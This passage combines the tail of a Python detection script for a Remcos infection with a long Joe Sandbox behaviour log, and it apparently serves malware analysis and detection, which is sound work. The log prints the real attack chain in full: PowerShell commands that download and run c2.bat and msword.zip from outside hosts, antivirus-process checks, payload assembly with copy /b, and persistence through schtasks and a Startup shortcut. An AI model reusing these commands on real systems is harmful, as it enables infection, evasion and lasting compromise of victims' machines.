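    # PowerShell pulling a script or archive from an unexpected host: the
    # delivery chain in this report (c2.bat, msword.zip) looks exactly like this.
    if (POWERSHELL_UA in ua and host not in POWERSHELL_ALLOWED_HOSTS
            and url.lower().endswith(SCRIPT_OR_ARCHIVE)):
        out.append(("powershell_download", f"{who} {host}{url}"))
    if host in GEOIP_HOSTS:
        out.append(("geoip_lookup", f"{who} {host}{url}"))
    return out


def analyze(lines):
    """Return (rule_name, detail) pairs for every record that matches an indicator."""
    findings = []
    for raw in lines:
        ev = json.loads(raw)
        who = (f"{ev.get('src_ip')}:{ev.get('src_port', 0)} -> "
               f"{ev.get('dest_ip')}:{ev.get('dest_port', 0)}")
        et = ev.get("event_type")
        if et == "tls":
            if ev.get("tls", {}).get("ja3", {}).get("hash") == REMCOS_JA3:
                findings.append(("remcos_ja3", who))
            if (ev.get("dest_ip"), ev.get("dest_port")) in C2_ENDPOINTS:
                findings.append(("remcos_c2_endpoint", who))
        elif et == "http":
            findings.extend(_http_findings(ev, who))
        elif et == "dns":
            name = ev.get("dns", {}).get("rrname", "")
            if len(name.rsplit(".", 1)[-1]) > MAX_TLD_LEN:
                findings.append(("bogus_tld_query", name))
    return findings


def rules_hit(lines):
    """Distinct rule names that fired, sorted, for a quick triage summary."""
    return sorted({rule for rule, _ in analyze(lines)})


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_EVE):
        print(f"{rule:22s} {detail}")
```

Two caveats when turning this into production detection. A JA3 hash fingerprints a TLS client stack, not a malware family, so treat the `remcos_ja3` hit as corroboration of the endpoint match rather than proof on its own. geoplugin.net is a public geolocation API that other software also calls; in this report it matters because the lookup comes from the same host and time window as the C2 session, so correlate it rather than alerting on it alone. The eight "UDP traffic detected without corresponding DNS query: 1.1.1.1" rows are the sandbox noting resolver traffic to an address it never saw resolved by name and need no rule of their own.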

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F4F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00299FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F69FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File dump: msword.exe.13.dr 597659152 bytes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00274763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00261B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0026F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F3F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\EquationsHighlights
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\OurProperty
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\ItemAnytime
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\ExpenditureBlood
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\DentalSubtle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04817E8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04818A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04819516
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_004074BB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00228017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0021E144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0020E1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0023A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002222A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002022AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0021C624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0023E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0028C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00272A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00236ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00268BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0021CD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0022CE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00237159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00209240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00295311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_002096E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00221704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00221A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00209B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00227B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00221D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00227DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_00221FE7
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF8017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EDE1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EEE144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00ED22AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EF22A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00F0A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00EEC624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F5C8A438_2_00F5C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0E87F38_2_00F0E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F06ADE38_2_00F06ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F42A0538_2_00F42A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F38BFF38_2_00F38BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EECD7A38_2_00EECD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EFCE1038_2_00EFCE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F0715938_2_00F07159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED924038_2_00ED9240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F6531138_2_00F65311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED96E038_2_00ED96E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF170438_2_00EF1704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1A7638_2_00EF1A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF7B8B38_2_00EF7B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00ED9B6038_2_00ED9B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF7DBA38_2_00EF7DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1D2038_2_00EF1D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF1FE738_2_00EF1FE7
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: String function: 004062A3 appears 58 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00EF0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00220DA0 appears 46 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 0021FD52 appears 40 times
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: String function: 00EEFD52 appears 40 times
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@70/98@8/2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002741FA GetLastError,FormatMessageW,36_2_002741FA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00262010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,36_2_00262010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00261A0B AdjustTokenPrivileges,CloseHandle,36_2_00261A0B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F32010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,38_2_00F32010
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F31A0B AdjustTokenPrivileges,CloseHandle,38_2_00F31A0B
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,16_2_004044A5
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0026DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,36_2_0026DD87
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004024FB CoCreateInstance,16_2_004024FB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00273A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,36_2_00273A0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Downloads\W2.pdfJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtm2w1bd.swg.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Korea" Measurement
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com Propose.com U
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
